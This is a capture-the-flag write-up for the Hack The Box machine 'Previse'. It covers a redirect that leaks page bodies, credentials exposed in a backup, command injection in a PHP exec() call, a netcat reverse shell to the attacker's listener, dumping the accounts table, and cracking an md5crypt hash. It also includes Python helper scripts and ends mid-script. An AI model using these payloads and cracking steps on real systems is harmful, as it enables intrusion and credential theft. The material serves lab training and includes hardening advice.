Previse-htb-writeup

0x00 Skills covered

Techniques in this box: 302 redirect (temporary) that still ships the protected page body, information disclosure through a backup archive, code review, command injection via exec(), cracking salted MD5 (md5crypt) passwords, PATH environment variable hijacking under sudo.

Reference: https://theredbay.net/infosec/htb/htb-previse/

0x01 Getting a user shell

1. Target IP: 10.10.11.104

2. Check reachability first, so we do not waste time port-scanning a host that is down

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.104 -c 4
PING 10.10.11.104 (10.10.11.104) 56(84) bytes of data.
64 bytes from 10.10.11.104: icmp_seq=1 ttl=63 time=359 ms
64 bytes from 10.10.11.104: icmp_seq=2 ttl=63 time=283 ms
64 bytes from 10.10.11.104: icmp_seq=3 ttl=63 time=307 ms
64 bytes from 10.10.11.104: icmp_seq=4 ttl=63 time=319 ms

--- 10.10.11.104 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3008ms
rtt min/avg/max/mdev = 283.261/317.115/358.861/27.377 ms

3. Port scan: a fast full-range sweep first, then version and default-script detection against only the open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.104
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 11:23 CST
Nmap scan report for 10.10.11.104
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 11:26 CST
Nmap scan report for 10.10.11.104
Host is up (0.36s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.01 seconds

4. Only two ports are open: 22 (OpenSSH 7.6p1) and 80 (Apache 2.4.29). Also note the nmap script output: the PHPSESSID cookie is set without the HttpOnly flag, and the root URL redirects to login.php.

5. Directory brute-forcing with dirsearch and gobuster turns up nothing exotic, but look closely at the sizes: accounts.php, files.php, status.php and index.php all answer 302 to login.php with multi-kilobyte bodies, while download.php and logout.php redirect with 0 bytes. A redirect that carries a full page is worth a second look.

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.11.104
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.11.104/_23-12-26_11-31-58.txt

Target: http://10.10.11.104/

[11:31:58] Starting:
[11:32:03] 301 - 309B - /js -> http://10.10.11.104/js/
[11:32:12] 403 - 277B - /.ht_wsr.txt
[11:32:12] 403 - 277B - /.htaccess.bak1
[11:32:12] 403 - 277B - /.htaccess.sample
[11:32:12] 403 - 277B - /.htaccess.orig
[11:32:12] 403 - 277B - /.htaccess_sc
[11:32:12] 403 - 277B - /.htaccess_extra
[11:32:12] 403 - 277B - /.htaccess.save
[11:32:12] 403 - 277B - /.htaccess_orig
[11:32:12] 403 - 277B - /.htaccessBAK
[11:32:12] 403 - 277B - /.htaccessOLD
[11:32:12] 403 - 277B - /.htaccessOLD2
[11:32:12] 403 - 277B - /.htm
[11:32:12] 403 - 277B - /.html
[11:32:12] 403 - 277B - /.htpasswd_test
[11:32:12] 403 - 277B - /.htpasswds
[11:32:12] 403 - 277B - /.httr-oauth
[11:32:15] 403 - 277B - /.php
[11:32:28] 302 - 4KB - /accounts.php -> login.php
[11:33:05] 200 - 0B - /config.php
[11:33:09] 301 - 310B - /css -> http://10.10.11.104/css/
[11:33:14] 302 - 0B - /download.php -> login.php
[11:33:19] 200 - 15KB - /favicon.ico
[11:33:20] 302 - 5KB - /files.php -> login.php
[11:33:20] 200 - 168B - /footer.php
[11:33:24] 200 - 381B - /header.php
[11:33:30] 200 - 475B - /js/
[11:33:34] 200 - 768B - /login.php
[11:33:35] 302 - 0B - /logout.php -> login.php
[11:34:01] 403 - 277B - /server-status
[11:34:01] 403 - 277B - /server-status/
[11:34:09] 302 - 3KB - /status.php -> login.php
Task Completed

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.11.104 --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/favicon.ico (Status: 200) [Size: 15406]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

6. So far all we have learned is the default index path. The detail that matters is not that the redirect is a 302 rather than a 301, but that the 302 to login.php comes with a 2801-byte body: the server renders the authenticated page and sends it along with the redirect. That is the classic symptom of PHP calling header('Location: login.php') without an exit() or die() afterwards, so the rest of the script still runs. Any client that does not follow redirects sees the content.

/index.php            (Status: 302) [Size: 2801] [--> login.php]

7. Fetch index.php with curl. curl does not follow redirects unless -L is given, so it simply prints the body that travels with the 302.

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.11.104/index.php

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta charset="utf-8" />


<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="description" content="Previse rocks your socks." />
<meta name="author" content="m4lwhere" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="stylesheet" href="css/uikit.min.css" />
<script src="js/uikit.min.js"></script>
<script src="js/uikit-icons.min.js"></script>


<title>Previse Home</title>
</head>
<body>

<nav class="uk-navbar-container" uk-navbar>
<div class="uk-navbar-center">
<ul class="uk-navbar-nav">
<li class="uk-active"><a href="/index.php">Home</a></li>
<li>
<a href="accounts.php">ACCOUNTS</a>
<div class="uk-navbar-dropdown">
<ul class="uk-nav uk-navbar-dropdown-nav">
<li><a href="accounts.php">CREATE ACCOUNT</a></li>
</ul>
</div>
</li>
<li><a href="files.php">FILES</a></li>
<li>
<a href="status.php">MANAGEMENT MENU</a>
<div class="uk-navbar-dropdown">
<ul class="uk-nav uk-navbar-dropdown-nav">
<li><a href="status.php">WEBSITE STATUS</a></li>
<li><a href="file_logs.php">LOG DATA</a></li>
</ul>
</div>
</li>
<li><a href="#" class=".uk-text-uppercase"></span></a></li>
<li>
<a href="logout.php">
<button class="uk-button uk-button-default uk-button-small">LOG OUT</button>
</a>
</li>
</ul>
</div>
</nav>

<section class="uk-section uk-section-default">
<div class="uk-container">
<h2 class="uk-heading-divider">Previse File Hosting</h2>
<p>Previse File Hosting Service Management.</p>
<p>Don't have an account? Create one!</p>
</div>
</section>

<div class="uk-position-bottom-center uk-padding-small">
<a href="https://m4lwhere.org/" target="_blank"><button class="uk-button uk-button-text uk-text-small">Created by m4lwhere</button></a>
</div>
</body>
</html>

8. This is clearly not the login page a browser shows. To browse the site this way, intercept the responses in Burp and keep the browser from following the redirect (change the 302 status line to 200 OK, or strip the Location header) so it renders the leaked body.

9. The page that deserves attention is accounts.php: fetched the same way, it serves the full account-creation form.
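The check above, turned into a small scanner (added example, not tooling from the writeup): request each path without following redirects and flag any 3xx response whose body is big enough to be a rendered page, then pull the title and .php links out of the leaked HTML as new attack surface. The host and paths are the ones from this box; the 512-byte threshold is an assumption, chosen because a proper redirect carries at most a short stub body.

```python
"""Find pages that answer with a redirect but still ship the protected body.

Added example, not tooling from the writeup. The pattern it looks for is the
one behind the whole foothold: index.php (and accounts.php, files.php ...)
return "302 -> login.php" yet the response body is the full page, which is
what you get when PHP calls header('Location: ...') and keeps executing
instead of exit()-ing. Host and paths are the ones from the writeup; the
512-byte threshold is an assumption (a proper redirect carries at most a
short stub).
"""
import http.client
import re
from urllib.parse import urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
MIN_LEAK_BYTES = 512  # assumption: anything bigger than a stub is rendered content

TITLE_RE = re.compile(rb"<title>(.*?)</title>", re.I | re.S)
HREF_RE = re.compile(rb'href=["\']([^"\']+\.php)["\']', re.I)


def is_leaky_redirect(status: int, body: bytes) -> bool:
    """A 3xx whose body is big enough to be a real page, not a stub."""
    return status in REDIRECT_CODES and len(body) >= MIN_LEAK_BYTES


def summarize(body: bytes) -> dict:
    """Pull the title and .php links out of a leaked body: new attack surface."""
    m = TITLE_RE.search(body)
    title = m.group(1).decode("utf-8", "replace").strip() if m else ""
    links = sorted({h.decode("utf-8", "replace") for h in HREF_RE.findall(body)})
    return {"title": title, "links": links}


def fetch(base: str, path: str, cookie=None):
    """GET without following redirects (http.client never follows them)."""
    u = urlsplit(base)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    headers = {"Cookie": cookie} if cookie else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location", ""), body


def scan(base: str, paths):
    """Return (path, status, location, summary) for every leaky redirect found."""
    findings = []
    for path in paths:
        status, location, body = fetch(base, path)
        if is_leaky_redirect(status, body):
            findings.append((path, status, location, summarize(body)))
    return findings


if __name__ == "__main__":
    targets = ["/index.php", "/accounts.php", "/files.php", "/status.php", "/file_logs.php"]
    for path, status, loc, info in scan("http://10.10.11.104", targets):
        print(f"{path}: {status} -> {loc}, but body leaks {info['title']!r}; "
              f"links: {', '.join(info['links'])}")
```

Feed it the paths from the dirsearch output; the ones that come back with a title and a navigation menu are the ones to open in Burp with the redirect suppressed.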

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.11.104/accounts.php

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta charset="utf-8" />


<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="description" content="Previse rocks your socks." />
<meta name="author" content="m4lwhere" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="stylesheet" href="css/uikit.min.css" />
<script src="js/uikit.min.js"></script>
<script src="js/uikit-icons.min.js"></script>

<title>Previse Create Account</title>
</head>
<body>

<nav class="uk-navbar-container" uk-navbar>
<div class="uk-navbar-center">
<ul class="uk-navbar-nav">
<li class="uk-active"><a href="/index.php">Home</a></li>
<li>
<a href="accounts.php">ACCOUNTS</a>
<div class="uk-navbar-dropdown">
<ul class="uk-nav uk-navbar-dropdown-nav">
<li><a href="accounts.php">CREATE ACCOUNT</a></li>
</ul>
</div>
</li>
<li><a href="files.php">FILES</a></li>
<li>
<a href="status.php">MANAGEMENT MENU</a>
<div class="uk-navbar-dropdown">
<ul class="uk-nav uk-navbar-dropdown-nav">
<li><a href="status.php">WEBSITE STATUS</a></li>
<li><a href="file_logs.php">LOG DATA</a></li>
</ul>
</div>
</li>
<li><a href="#" class=".uk-text-uppercase"></span></a></li>
<li>
<a href="logout.php">
<button class="uk-button uk-button-default uk-button-small">LOG OUT</button>
</a>
</li>
</ul>
</div>
</nav>

<section class="uk-section uk-section-default">
<div class="uk-container">
<h2 class="uk-heading-divider">Add New Account</h2>
<p>Create new user.</p>
<p class="uk-alert-danger">ONLY ADMINS SHOULD BE ABLE TO ACCESS THIS PAGE!!</p>
<p>Usernames and passwords must be between 5 and 32 characters!</p>
</p>
<form role="form" method="post" action="accounts.php">
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: user"></span>
<input type="text" name="username" class="uk-input" id="username" placeholder="Username">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="password" class="uk-input" id="password" placeholder="Password">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
</div>
</div>
<button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>
</div>
</section>

<div class="uk-position-bottom-center uk-padding-small">
<a href="https://m4lwhere.org/" target="_blank"><button class="uk-button uk-button-text uk-text-small">Created by m4lwhere</button></a>
</div>
</body>
</html>

10. This page lets us register an account even though it warns that only admins should reach it: the access check is the same redirect-without-exit, so the POST is processed. We registered test123:test123.

11. Logging in with that account, files.php lists a backup archive of the site. Download it and unpack it.

http://10.10.11.104/files.php

12. Inside the backup, config.php contains the database credentials. Note that requesting /config.php on the live server returned 200 with a 0-byte body (dirsearch output above) because PHP executes it and prints nothing; the source only comes from the archive.

cat config.php

<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>

13. file_logs.php offers the file access log for download; it contains entries for another account, m4lwhere.

http://10.10.11.104/file_logs.php

14. Also in the backup, logs.php (the script behind the log download) contains the line that makes this exploitable:

http://10.10.11.104/logs.php

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

15. The delim POST parameter is under our control and is interpolated straight into the exec() command line with no validation or escaping. A ';' ends the intended argument and whatever follows runs as a separate shell command, as www-data.

16. The whole exploit is done with curl. First log in and capture the session cookie (curl -c - prints the cookie jar to stdout):
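The sink described above, modelled in Python beside a hardened version (added example, not code from the writeup or from the Previse site). The vulnerable function reproduces the PHP's mistake, splicing the parameter into a string that /bin/sh parses; the safe one allow-lists the value and passes it as a single argv element with no shell. `echo` stands in for /opt/scripts/log_process.py so the model runs anywhere, and the set of allowed delimiter names is an assumption, not a list taken from the site.

```python
"""The exec() sink in logs.php, modelled in Python, beside a hardened version.

Added example, not code from the writeup or the Previse site. logs.php runs
    exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
so the request parameter is spliced into a shell command line. `echo` stands
in for log_process.py here (assumption, so the model runs anywhere), and the
allowed delimiter names are an assumption: whatever the form really offers.
"""
import subprocess

ALLOWED_DELIMS = {"comma", "space", "tab"}   # assumption: the form's real options


def vulnerable_log_process(delim: str) -> str:
    """Same shape as the PHP: input glued into a string that /bin/sh parses."""
    cmd = f"echo delim={delim}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_allowed(delim: str) -> bool:
    """An enum-like parameter gets an allow-list, not escaping."""
    return delim in ALLOWED_DELIMS


def safe_log_process(delim: str) -> str:
    """Allow-list the value, then pass it as one argv element with no shell involved."""
    if not is_allowed(delim):
        raise ValueError(f"unexpected delim {delim!r}")
    return subprocess.run(["echo", f"delim={delim}"],
                          capture_output=True, text=True).stdout


def injection_payload(lhost: str, lport: int, delim: str = "space") -> str:
    """The delim value the writeup posts: the expected argument, then ';' and our command."""
    return f"{delim}; nc {lhost} {lport} -e /bin/bash"


if __name__ == "__main__":
    print(vulnerable_log_process("space; id"), end="")       # the second command runs
    print(injection_payload("10.10.14.2", 443))
    try:
        safe_log_process("space; id")
    except ValueError as e:
        print("hardened version rejected it:", e)
```

In PHP the equivalent fix is to compare $_POST['delim'] against the fixed set of names before building the command, or at minimum wrap it in escapeshellarg(); for a parameter with three legal values the allow-list is the right tool, and escaping is only a fallback for genuinely free-form input.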

┌──(kali㉿kali)-[~/桌面]
└─$ curl -XPOST -c - 'http://10.10.11.104/login.php' --data-raw 'username=test123&password=test123'

10.10.11.104 FALSE / FALSE 0 PHPSESSID 9hqk10ige43tpd8cgub3hk4mia

17. Then send the injection: the expected delimiter, a ';', and a reverse-shell command, with a listener already waiting on 10.10.14.2:443. curl sends the spaces and the ';' in --data-raw unencoded, which PHP accepts as-is.

┌──(kali㉿kali)-[~/桌面]
└─$ curl -XPOST 'http://10.10.11.104/logs.php' -H 'Cookie: PHPSESSID=9hqk10ige43tpd8cgub3hk4mia' --data-raw 'delim=space; nc 10.10.14.2 443 -e /bin/bash'

18. The listener receives the connection and we have an initial shell, as www-data. Upgrade it to a pty and look around the web root.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.104] 54358
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@previse:/var/www/html$

www-data@previse:/var/www/html$ ls -la
ls -la
total 188
drwxr-xr-x 4 www-data www-data 4096 Jul 26 2021 .
drwxr-xr-x 3 root root 4096 Jul 26 2021 ..
-rw-r--r-- 1 www-data www-data 5689 Jun 12 2021 accounts.php
-rwxrwxr-x 1 www-data www-data 16042 Jun 3 2021 android-chrome-192x192.png
-rwxrwxr-x 1 www-data www-data 50545 Jun 3 2021 android-chrome-512x512.png
-rwxrwxr-x 1 www-data www-data 14096 Jun 3 2021 apple-touch-icon.png
-rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 css
-rw-r--r-- 1 www-data www-data 1562 Jun 9 2021 download.php
-rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png
-rwxrwxr-x 1 www-data www-data 1708 Jun 3 2021 favicon-32x32.png
-rwxrwxr-x 1 www-data www-data 15406 Jun 3 2021 favicon.ico
-rw-r--r-- 1 www-data www-data 1191 Jun 12 2021 file_logs.php
-rw-r--r-- 1 www-data www-data 6107 Jun 9 2021 files.php
-rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php
-rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php
-rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 js
-rw-r--r-- 1 www-data www-data 2967 Jun 12 2021 login.php
-rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php
-rw-r--r-- 1 www-data www-data 1174 Jun 9 2021 logs.php
-rw-r--r-- 1 www-data www-data 1279 Jun 5 2021 nav.php
-rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest
-rw-r--r-- 1 www-data www-data 1900 Jun 9 2021 status.php
www-data@previse:/var/www/html$

19. The usual next step is to dig through the web root for configuration to pivot to a real user. We already have the database connection details from config.php and know a user named m4lwhere exists, so query the accounts table directly.

www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -e 'show databases'
< --password='mySQL_p@ssw0rd!:)' -e 'show databases'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'show tables'
<ord='mySQL_p@ssw0rd!:)' -D previse -e 'show tables'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'describe accounts'
<ySQL_p@ssw0rd!:)' -D previse -e 'describe accounts'
mysql: [Warning] Using a password on the command line interface can be insecure.
+------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+------------+--------------+------+-----+-------------------+----------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'select username,password from accounts'
<previse -e 'select username,password from accounts'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+------------------------------------+
| username | password |
+----------+------------------------------------+
| m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. |
| test123 | $1$🧂llol$sP8qi2I.K6urjPuzdGizl1 |
+----------+------------------------------------+
www-data@previse:/var/www/html$

20. The table holds our own account and the hash for m4lwhere:

m4lwhere
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

21. The "$1$" prefix identifies md5crypt, the crypt(3) MD5 scheme: a salted hash that runs 1000 rounds of MD5 over the password and salt. The salt defeats precomputed rainbow tables, but two things stand out here. Both rows carry the identical salt "🧂llol", so the application hard-codes it instead of generating one per user, which gives away most of the benefit of salting (identical passwords produce identical hashes). And the salt starts with an emoji: in UTF-8 that is four bytes, so the whole salt is exactly the eight bytes md5crypt allows.

22. Try john first:

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali:
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 ASIMD 4x2])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:18 DONE (2023-12-26 15:28) 0g/s 101761p/s 101761c/s 101761C/s c125263..*7¡Vamos!
Session completed.

23. John ran through rockyou without a hit. That is not because john cannot handle salted hashes; md5crypt is a salted format it supports natively. A plausible culprit is the multi-byte emoji in the salt, and john's own warning that the string is also recognised as "md5crypt-long" is a hint that its salt parsing is at the edge, so forcing --format=md5crypt-long is the first thing to try before blaming the tool. Rather than debug it, switch to hashcat with mode 500 (md5crypt):

shiyan@InfoSec dict-list % sudo hashcat -a 0 -m 500 ./hash ./rockyou.txt
Password:
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
You have been warned.

METAL API (Metal 341.29)
========================
* Device #1: Apple M2 Pro, 5408/10922 MB, 19MCU

OpenCL API (OpenCL 1.2 (Sep 30 2023 03:48:09)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2 Pro, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 667 MB

Dictionary cache built:
* Filename..: ./rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Time.Started.....: Tue Dec 26 15:49:54 2023 (22 secs)
Time.Estimated...: Tue Dec 26 15:50:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 341.0 kH/s (29.57ms) @ Accel:32 Loops:125 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7471104/14344385 (52.08%)
Rejected.........: 0/7471104 (0.00%)
Restore.Point....: 7393280/14344385 (51.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidate.Engine.: Device Generator
Candidates.#1....: iloverobert!!! -> iarn17
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 99%

Started: Tue Dec 26 15:49:40 2023
Stopped: Tue Dec 26 15:50:17 2023
shiyan@InfoSec dict-list %
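Before trusting a cracked candidate, or when two crackers disagree as john and hashcat did here, it is worth verifying the answer offline. The block below is an added example, not code from the writeup: a pure-Python re-implementation of md5crypt (the crypt(3) "$1$" scheme that hashcat mode 500 targets) built on nothing but hashlib, plus a verify() and a minimal dictionary attack. It also shows why the emoji salt is harmless to the algorithm: the salt is taken as raw bytes and cut at eight, and the UTF-8 encoding of "🧂llol" is exactly eight bytes. The hash and password are the ones from this box; the candidate list in the usage is constructed.

```python
"""Verify or dictionary-attack an md5crypt ("$1$") hash in pure Python.

Added example, not part of the original writeup. It re-implements the
crypt(3) MD5 scheme (password and salt fed through 1000 rounds of MD5,
then crypt's own base64) so a cracker's answer can be checked offline with
nothing but hashlib. The salt is handled as raw bytes and cut at 8, which
is why the emoji salt is no problem for the algorithm: UTF-8 "🧂llol" is
exactly 8 bytes (4 for the emoji, 4 for "llol").
"""
import hashlib
from typing import Iterable, Optional

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"
ROUNDS = 1000  # fixed by the md5crypt design; there is no cost parameter


def _to64(value: int, n: int) -> bytes:
    """crypt(3)'s base64: n chars, 6 bits each, least significant bits first."""
    out = bytearray()
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> bytes:
    """Return the full "$1$<salt>$<22 chars>" string, as crypt(3)/PHP crypt() would."""
    salt = salt.split(b"$", 1)[0][:8]          # stop at '$', at most 8 bytes
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    n = len(password)
    while n > 0:                                # len(password) bytes of alt, repeated
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(password)
    while n:                                    # one byte per bit of len(password)
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(ROUNDS):                     # the stretching loop
        c = hashlib.md5(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in groups)
    enc += _to64(final[11], 2)
    return MAGIC + salt + b"$" + enc


def split_hash(hash_str: str):
    """'$1$salt$digest' -> (salt, digest); rejects anything that is not md5crypt."""
    parts = hash_str.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return parts[2], parts[3]


def verify(password: str, hash_str: str) -> bool:
    """Recompute with the stored salt and compare the 22-char digest part."""
    salt, digest = split_hash(hash_str)
    computed = md5crypt(password.encode("utf-8"), salt.encode("utf-8"))
    return computed.rsplit(b"$", 1)[1] == digest.encode("ascii")


def crack(hash_str: str, candidates: Iterable[str]) -> Optional[str]:
    """Plain dictionary attack; returns the first candidate that verifies."""
    for pw in candidates:
        if verify(pw, hash_str):
            return pw
    return None


if __name__ == "__main__":
    h = "$1$🧂llol$DQpmdvnb7EeuO6UaqRItf."     # m4lwhere's row from the accounts table
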